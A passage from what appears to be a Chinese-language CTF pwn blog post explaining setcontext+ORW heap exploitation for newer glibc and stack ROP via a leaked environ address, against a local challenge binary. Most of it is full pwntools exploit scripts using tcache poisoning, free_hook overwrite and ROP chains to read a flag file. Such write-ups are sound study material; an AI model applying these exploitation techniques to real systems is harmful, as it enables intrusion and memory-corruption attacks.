class="number">3</span>)+p64(pop_rsi)</span><br><span class="line">pd+=p64(heap_addr)+p64(pop_rdx)+p64(<span class="number">0x100</span>)+p64(read)+p64(pop_rdi_rbp)+p64(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pd=p64(write)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x48</span>)</span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">raw_input()</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="二、setcontext-orw（libc-gt-2-29）"><a href="#二、setcontext-orw（libc-gt-2-29）" class="headerlink" title="二、setcontext+orw（libc&gt;2.29）"></a>二、setcontext+orw（libc&gt;2.29）</h2><h3 id="1、改动以及解决方法"><a href="#1、改动以及解决方法" class="headerlink" title="1、改动以及解决方法"></a>1、改动以及解决方法</h3><p><strong>libc：2.31</strong></p>
<p>在glibc高于2.29的版本里，setcontext从rdx寄存器索引去寻找寄存器的值而不是rdi寄存器，这意味着我们不能够通过free堆块，将其作为rdi传参来控制对应寄存器</p>
<p>因此我们需要一个magic gadget来帮助我们。根据大师傅所说的，在libc&gt;2.29的版本，基本都能找到类似  mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20] 这样的gadget。</p>
<p>我一开始不理解为什么要这种gadget，仔细分析一下，首先是mov rdx ，qword ptr [rdi + 8]，是将rdi+8的值赋值给rdx寄存器，介不控制了rdx了吗，然后有call了qword ptr [rdx + 0x20]，那我这里放setcontext介不是相当于又控制了rdx又控制了接下来执行的指令吗，ok，冲一发先。</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/v2emHP"><img src="https://s1.ax1x.com/2022/08/25/v2emHP.png" alt="v2emHP.png"></a></p>
<p>找到这样的类似gadget，然后我们free堆块依旧当作rdi传参，然后rdi+8的位置刚好是我们的可控区域并且会将这里的值传入rdx，最后会call rdx +0x20这个位置。</p>
<p>那我们只要构造**’a’*8+p64(chunk)+’b’*0x10+p64(setcontext)**，其中chunk内布置我们利用setcontext的寄存器，然后劫持到堆上rop即可。</p>
<p>攻击效果如下</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/v2eaNT"><img src="https://s1.ax1x.com/2022/08/25/v2eaNT.jpg" alt="v2eaNT.jpg"></a></p>
<h3 id="2、exp"><a href="#2、exp" class="headerlink" title="2、exp"></a>2、exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">p=process(<span class="string">&#x27;./silverwolf&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./silverwolf&#x27;</span>)</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>(<span class="params">choice</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params"><span class="built_in">id</span>,size</span>):</span><br><span class="line">    menu(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params"><span class="built_in">id</span>,data</span>):</span><br><span class="line">    menu(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Content:&quot;</span>,<span class="built_in">str</span>(data))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    menu(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    menu(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    raw_input(<span class="string">&#x27;check&#x27;</span>)</span><br><span class="line"><span class="comment">#add(0,0x18)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#edit(0,&#x27;flag.txt\n&#x27;)</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x8</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Content: &quot;</span>)</span><br><span class="line">heap_addr=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x17d0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+]heap=&#x27;</span>+<span class="built_in">hex</span>(heap_addr))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x511</span>)+p64(heap_addr+<span class="number">0x1330</span>))<span class="comment">#fake unsorted bin</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"><span class="comment">#edit(0,heap_addr)</span></span><br><span class="line"><span class="comment">#add(0,0x38)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#check()</span></span><br><span class="line">edit(<span class="number">0</span>,p64(heap_addr+<span class="number">0x1970</span>))</span><br><span class="line">chunk_head=p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">15</span>):</span><br><span class="line">  add(<span class="number">0</span>,<span class="number">0x58</span>)</span><br><span class="line">  edit(<span class="number">0</span>,p64(<span class="number">0</span>)*<span class="number">6</span>+chunk_head)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc=u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x1ecbe0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+]libc=&#x27;</span>+<span class="built_in">hex</span>(libc))</span><br><span class="line"></span><br><span class="line">setcontext=libc+<span class="number">0x54f20</span>+<span class="number">61</span></span><br><span class="line">free_hook=libc+<span class="number">0x1eee48</span></span><br><span class="line">write=libc+<span class="number">0x10e060</span></span><br><span class="line">read=libc+<span class="number">0x10dfc0</span></span><br><span class="line">openadd=libc+<span class="number">0x10dce0</span></span><br><span class="line">pop_rsi_15=libc+<span class="number">0x0000000000023b68</span></span><br><span class="line">pop_rdi=libc+<span class="number">0x0000000000023b6a</span></span><br><span class="line">pop_rsi=libc+<span class="number">0x000000000002601f</span></span><br><span class="line">pop_rdx=libc+<span class="number">0x0000000000142c92</span></span><br><span class="line">pop_rax=libc+<span class="number">0x0000000000036174</span></span><br><span class="line">syscall=libc+<span class="number">0x00000000000630a9</span></span><br><span class="line">magic_gadget=libc+<span class="number">0x0000000000151990</span></span><br><span class="line">ret=libc+<span class="number">0x0000000000022679</span></span><br><span class="line">pop_rdi_rbp=libc+<span class="number">0x00000000000248f2</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(free_hook)*<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x18</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&#x27;./flag\x00&#x27;</span>)</span><br><span class="line">flag_addr=heap_addr+<span class="number">0x1650</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line">rop_addr=heap_addr</span><br><span class="line"><span class="comment">#edit(0,&#x27;a&#x27;*8+p64(heap_addr)+&#x27;b&#x27;*8+p64(setcontext))</span></span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#check()</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(magic_gadget)*<span class="number">2</span>)</span><br><span class="line">fake_rsp=heap_addr</span><br><span class="line">pd=p64(<span class="number">9</span>)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">12</span>)+p64(<span class="number">13</span>)+p64(<span class="number">14</span>)+p64(<span class="number">15</span>)+p64(flag_addr)+p64(<span class="number">2</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0xaa</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x58</span>)</span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line"></span><br><span class="line"><span class="comment">#check()</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x58</span>)</span><br><span class="line"><span class="comment">#add(0,0x78)</span></span><br><span class="line">pd=<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0xaa</span>)+p64(heap_addr+<span class="number">0x1a10</span>)+p64(pop_rax)</span><br><span class="line">pd+=p64(<span class="number">2</span>)+p64(syscall)+p64(pop_rdi)+p64(<span class="number">3</span>)+p64(pop_rsi)</span><br><span class="line">pd+=p64(heap_addr)+p64(pop_rdx)</span><br><span class="line"><span class="comment">#p64(0x100)+p64(read)+p64(pop_rdi_rbp)+p64(1)</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line">pd=p64(read)+p64(pop_rdi_rbp)+p64(<span class="number">1</span>)+p64(<span class="number">0</span>)+p64(write)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line"><span class="comment">#check()</span></span><br><span class="line"><span class="comment">#pd=p64(write)</span></span><br><span class="line"><span class="comment">#add(0,0x48)</span></span><br><span class="line"><span class="comment">#edit(0,pd)</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line">check()</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>+p64(heap_addr+<span class="number">0x1970</span>)+<span class="string">&#x27;b&#x27;</span>*<span class="number">0x10</span>+p64(setcontext))</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="三、利用environ"><a href="#三、利用environ" class="headerlink" title="三、利用environ"></a>三、利用environ</h2><p>曾经volcano的学长告诉我这一招，就是申请到栈上rop，回归pwn最初的模样，找回初恋的感觉（x</p>
<h3 id="1、environ变量"><a href="#1、environ变量" class="headerlink" title="1、environ变量"></a>1、environ变量</h3><p>environ变量是glibc里的一个环境变量。里面会存储一个栈的地址。得知栈地址我们就可以将chunk申请到栈上，找回初次与pwn相恋的感觉</p>
<h3 id="2、调试小tips"><a href="#2、调试小tips" class="headerlink" title="2、调试小tips"></a>2、调试小tips</h3><p>每一个函数栈帧与这个environ值的偏移是不同的，我们需要申请的是你最后完成rop布局时ret的地址</p>
<p>可以在ida里找到retn</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/vhXRts"><img src="https://s1.ax1x.com/2022/08/30/vhXRts.png" alt="vhXRts.png"></a></p>
<p>我们尝试断点到edit函数的这个retn</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/vhX7BF"><img src="https://s1.ax1x.com/2022/08/30/vhX7BF.png" alt="vhX7BF.png"></a></p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">pwndbg</span>&gt; b *$rebase(<span class="number">0</span>x1056)</span><br><span class="line"><span class="attribute">Breakpoint</span> <span class="number">1</span> at <span class="number">0</span>x55985f001056</span><br></pre></td></tr></table></figure>

<p>找到此时的rsp地址</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/vhXLN9"><img src="https://s1.ax1x.com/2022/08/30/vhXLN9.png" alt="vhXLN9.png"></a></p>
<p>这个<strong>0x7ffcc4659008</strong>就是我们要打的ret，接下来申请过去无脑塞ROP就可以了。</p>
<p><strong>本地libc：2.27-3ubuntu1.5_amd64</strong></p>
<p>需要注意的是本题在打tcache poison时要注意维护下原链表，否则就容易无法再次申请该size大小的堆块，我下面的exp没有维护链表是因为libc版本是2.27，没有对cnt位的检测，可以直接找一个空的tcache bins去打tcache posion。当然可以直接打整个tcache struct（</p>
<h3 id="3、exp-1"><a href="#3、exp-1" class="headerlink" title="3、exp"></a>3、exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">p=process(<span class="string">&#x27;./silverwolf&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./silverwolf&#x27;</span>)</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>(<span class="params">choice</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params"><span class="built_in">id</span>,size</span>):</span><br><span class="line">    menu(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params"><span class="built_in">id</span>,data</span>):</span><br><span class="line">    menu(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    </span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Content:&quot;</span>,<span class="built_in">str</span>(data))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    menu(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    menu(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check</span>():</span><br><span class="line">   gdb.attach(p)</span><br><span class="line">   raw_input()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check_edit</span>(<span class="params"><span class="built_in">id</span>,data</span>):</span><br><span class="line">    menu(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    check()</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Content:&quot;</span>,<span class="built_in">str</span>(data))</span><br><span class="line"></span><br><span class="line"><span class="comment">#edit(0,&#x27;flag.txt\n&#x27;)</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x8</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Content: &quot;</span>)</span><br><span class="line">heap_addr=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x1790</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(heap_addr))</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x511</span>)+p64(heap_addr+<span class="number">0x10d0</span>))</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"><span class="comment">#edit(0,heap_addr)</span></span><br><span class="line"><span class="comment">#add(0,0x38)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,p64(heap_addr+<span class="number">0x1930</span>))</span><br><span class="line">chunk_head=p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">15</span>):</span><br><span class="line">  add(<span class="number">0</span>,<span class="number">0x58</span>)</span><br><span class="line">  edit(<span class="number">0</span>,p64(<span class="number">0</span>)*<span class="number">6</span>+chunk_head)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc=u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x3ebca0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc))</span><br><span class="line">setcontext=libc+<span class="number">0x52050</span>+<span class="number">53</span></span><br><span class="line">free_hook=libc+<span class="number">0x3ed8e8</span></span><br><span class="line">write=libc+<span class="number">0x1100f0</span></span><br><span class="line">read=libc+<span class="number">0x110020</span></span><br><span class="line">openadd=libc+<span class="number">0x10fbf0</span></span><br><span class="line">pop_rdi_rbp=libc+<span class="number">0x0000000000022394</span></span><br><span class="line">pop_rdi=libc+<span class="number">0x000000000002164f</span></span><br><span class="line">pop_rsi=libc+<span class="number">0x0000000000023a6a</span></span><br><span class="line">pop_rdx=libc+<span class="number">0x0000000000001b96</span></span><br><span class="line">pop_rax=libc+<span class="number">0x000000000001b500</span></span><br><span class="line">syscall=libc+<span class="number">0x00000000000d2625</span></span><br><span class="line">environ=libc+<span class="number">0x3ee098</span></span><br><span class="line">pop_rdx_rbx=libc+<span class="number">0x000000000011c35c</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(environ)*<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x18</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&#x27;./flag\x00&#x27;</span>)</span><br><span class="line">flag_addr=heap_addr+<span class="number">0x1610</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">stack=u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x120</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;[+]stack=&#x27;</span>+<span class="built_in">hex</span>(stack))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">orw1</span>():</span><br><span class="line">  add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">  delete(<span class="number">0</span>)</span><br><span class="line">  edit(<span class="number">0</span>,p64(stack))</span><br><span class="line">  add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">  </span><br><span class="line">  add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">  pd=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(<span class="number">0</span>)+p64(pop_rax)</span><br><span class="line">  pd+=p64(<span class="number">2</span>)+p64(syscall)+p64(pop_rdi)+p64(<span class="number">3</span>)+p64(pop_rsi)</span><br><span class="line">  pd+=p64(heap_addr)+p64(pop_rdx_rbx)+p64(<span class="number">0x100</span>)<span class="comment">#stack rop</span></span><br><span class="line">  <span class="built_in">print</span>(<span class="string">&#x27;[+]stack=&#x27;</span>+<span class="built_in">hex</span>(stack))</span><br><span class="line">  </span><br><span class="line">  check_edit(<span class="number">0</span>,pd)</span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(stack+<span class="number">0x70</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;write=&#x27;</span>+<span class="built_in">hex</span>(stack+<span class="number">0x70</span>))</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line">pd=p64(read)+p64(pop_rdi)+p64(<span class="number">1</span>)+p64(write)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">orw1()</span><br><span class="line"></span><br><span class="line"><span class="comment">#menu(5)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/08/02/%E5%8A%AA%E5%8A%9B%E6%88%90%E4%B8%BApwn%E7%88%B7%E7%B3%BB%E5%88%97-%E3%80%901%E3%80%91fsop/" rel="prev" title="努力成长的pwn弟系列-【1】fsop">
      <i class="fa fa-chevron-left"></i> 努力成长的pwn弟系列-【1】fsop
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
